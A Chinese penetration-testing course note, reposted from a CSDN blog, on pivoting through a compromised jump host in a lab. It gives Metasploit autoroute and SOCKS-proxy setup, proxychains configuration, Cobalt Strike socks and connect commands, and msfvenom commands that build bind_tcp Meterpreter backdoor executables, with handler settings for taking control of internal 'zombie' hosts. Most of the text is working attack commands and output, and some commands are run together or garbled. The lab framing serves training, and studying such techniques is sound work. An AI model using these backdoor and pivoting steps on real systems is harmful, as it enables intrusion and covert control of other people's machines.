知识点
#知识点:1、代理软件使用-Win&Linux
2、代理协议使用-Socks4/5
3、CS&MSF-网络通讯&控制上线
-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向(基础课程有讲过)
#系列点:1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃
演示案例
网络通讯-MSF&CS-路由添加&节点建立
控制上线-MSF&CS-协议生成&正反连接
#网络通讯-MSF&CS-路由添加&节点建立#控制上线-MSF&CS-协议生成&正反连接
代理协议:
SOCKS4/5
代理软件:
SocksCap Proxifier ProxyChains等
MSF通讯
1、添加路由 限于MSF
查看路由信息
run autoroute -p
run post/multi/manage/autoroute
添加指定路由,1是接收的session编号
route add192.168.11.0 255.255.255.0 12、Sock代理 全局同用
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1115
run
启用代理软件配置Sock5代理
CS通讯
命令:socks 59578
操作:代理转发-Socks代理
MSF控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333-f exe > bd.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129
set lport 3333
run
CS控制上线-正向连接
监听器:bind_tcp port
命令:connect ip port
实验2:二层(后续多层操作一致)
MSF控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455-f exe > bd2.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.22.131
set lport 4455
run
CS控制上线-正向连接
监听器:bind_tcp port
命令:connect ip port
个人理解
1、相当于本来流程是:解决网络通信问题 —> 拿到权限 —> 进行后门控制,但这里小迪只讲了如何解决网络通信问题和如何进行后门控制,拿到权限属于横向移动的内容后面才讲。
2、在本次实验环境中,Win 7主机有外网出口而其余主机没有,所以我们将Win 7当作跳板机进行操作。
3、如何解决网络通信?(比如拿到了Win 7后,我们如何通过Win 7和Win 10 通信?)
其方法有2种:MSF添加路由(仅限MSF内生效)、Sock代理(全局通用)
4、如何进行后门控制?(比如解决通信问题后,如何让Win 10上线?)
方法为:正向连接(适用于防火墙入站较松情况)、反向连接(适用于防火墙入站严格,方法稍复杂但也可以)
采用正向连接,配置bind_tcp后门(绑定本地2222端口)在Win 10运行,控制器使用MSF或CS连接Win 10的2222端口即可。
采用反向连接,配置reverse_tcp后门(绑定Win 7的3333端口)在Win 10运行,于是数据会交给Win 7的3333端口,再让Win 7的3333端口转发至其外网出口的4444端口,最后让控制器连接Win 7的4444端口即可。也就是Win 10无法直接出来,但可以利用Win 7出来。
5、关于正向、反向连接:
正向(bind_tcp):后门执行后数据交给本地2222端口,控制器连接肉机2222端口
反向(reverse_tcp):后门执行后数据交给远程控制器3333端口,控制器监听3333端口
实验记录
1、环境
攻击机 Kali 172.16.16.230 处于外网
攻击机 win11 172.16.16.27 处于外网
肉机1 winserver2019x1 外网卡:172.16.16.244 内网卡:192.168.1.30
肉机2 winserver2019x2 内网卡:192.168.1.31 (搭建有web服务)
2、解决网络通信问题
1、首先生成msf木马,让肉机1上线
2、msf添加路由(仅限MSF起效)
meterpreter > run post/multi/manage/autoroute
[+] Route added to subnet 172.16.16.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.1.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
172.16.16.0 255.255.255.0 Session 2192.168.1.0 255.255.255.0 Session 23、配置Sock代理(全局通用)
msf6 exploit(multi/handler)> use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy)>set srvhost 0.0.0.0
msf6 auxiliary(server/socks_proxy)>set srvport 1115
msf6 auxiliary(server/socks_proxy)> run
使用Kali自带的代理工具 proxychains4 配置Socks代理(配置文件在/etc/proxychains4.conf,修改端口为1115即可)
原理:相当于Kali通过MSF木马控制了肉鸡1,添加路由后已经可以在MSF里访问肉鸡2了。
但为了让其他工具也能通讯,所以使用代理工具配置Socks代理,于是Kali上其他工具也能访问肉鸡2了。
4、生成msf正向木马让肉鸡2上线
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444-f exe > bd.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.1.31
set lport 4444
run
标签:
安全
本文转载自: https://blog.csdn.net/qq_46081990/article/details/131504138
版权归原作者 Ch4ser 所有, 如有侵权,请联系我们删除。
版权归原作者 Ch4ser 所有, 如有侵权,请联系我们删除。